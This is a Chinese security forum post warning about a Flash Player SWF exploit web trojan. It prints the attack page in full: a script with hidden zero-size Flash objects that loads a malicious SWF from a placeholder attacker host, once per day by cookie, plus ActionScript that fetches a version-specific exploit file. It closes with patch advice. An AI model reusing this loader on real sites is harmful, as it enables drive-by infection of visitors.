.gif)
FLASH网马悄然现身互联网
[b][font=宋体][color=#808080]最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。[/color][/font][/b][b][color=#808080]以下为调用页内容:[/color][/b][b][font=宋体][b][font=宋体][/font][/b] [/font][/b][b][font=宋体][b][font=宋体][/font][/b][b][font=宋体][/font][/b][b][font=宋体][/font][/b][/font][/b][b][font=宋体][b][font=宋体]
[/font][/b][/font][/b][b][font=宋体][b][font=宋体]
[/font][/b][/font][/b][b][font=宋体][b][font=宋体]<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”[url=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4][color=#0000ff]http://download.macromedia.com/p ... flash.cab#version=4[/color][/url],0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”[url=http://www.xxx.cn/flash/XX.swf][color=#0000ff]http://www.XXX.cn/flash/XX.swf[/color][/url]”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”[url=http://www.xxx.cn/flash/XX.swf][color=#0000ff]http://www.XXX.cn/flash/XX.swf[/color][/url]” mce_src=”[url=http://www.xxx.cn/flash/XX.swf][color=#0000ff]http://www.XXX.cn/flash/XX.swf[/color][/url]”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>[/font][/b][b][font=宋体][b][font=宋体][/font][/b][/font][/b] [b][font=宋体][b][font=宋体][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][b][font=宋体]
[/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体]
[/font][/b][/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体]以下为正常的FLASH文件使用的脚本:
[/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][b][font=宋体][/font][/b][b][font=宋体]// Action script…[/font][/b][b][font=宋体]// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”[url=http://www.xxx.cn/flash/][color=#0000ff]http://www.XXX.cn/flash/[/color][/url]” + flashVersion + “[u][color=#0000ff]mal_swf[/color][/u].swf”, _root);
stop();[/font][/b][b][font=宋体][b][font=宋体][/font][/b] [/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][b][font=宋体][/font][/b][b][font=宋体][/font][/b][b][font=宋体]
[/font][/b][/font][/b][/font][/b][/font][/b][b][font=宋体][b][font=宋体][b][font=宋体][b][font=宋体]该恶意FLASH部分内容如附图[/font][/b][/font][/b][/font][/b][/font][/b]
[b][font=宋体][b][font=宋体][b][font=宋体][b][font=宋体]
[/font][/b][/font][/b][/font][/b][/font][/b]
[b][font=宋体][b][font=宋体][b][font=宋体][b][font=宋体][font=宋体][b]建议:[/b] [/font][font=宋体][font=宋体]
[b][color=#808080]厂商补丁: [/color][/b][color=#808080][b]Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: [/b][b][url=http://www.adobe.com/go/getflash][b][color=#0000ff]http://www.adobe.com/go/getflash[/color][/b][/url][/b][/color][/font][/font]
[/font][/b]
[/font][/b][/font][/b][/font][/b][/font][/b][/font][/b] 主页是英文的...又不知道补丁的名称...有点郁闷:L
页:
[1]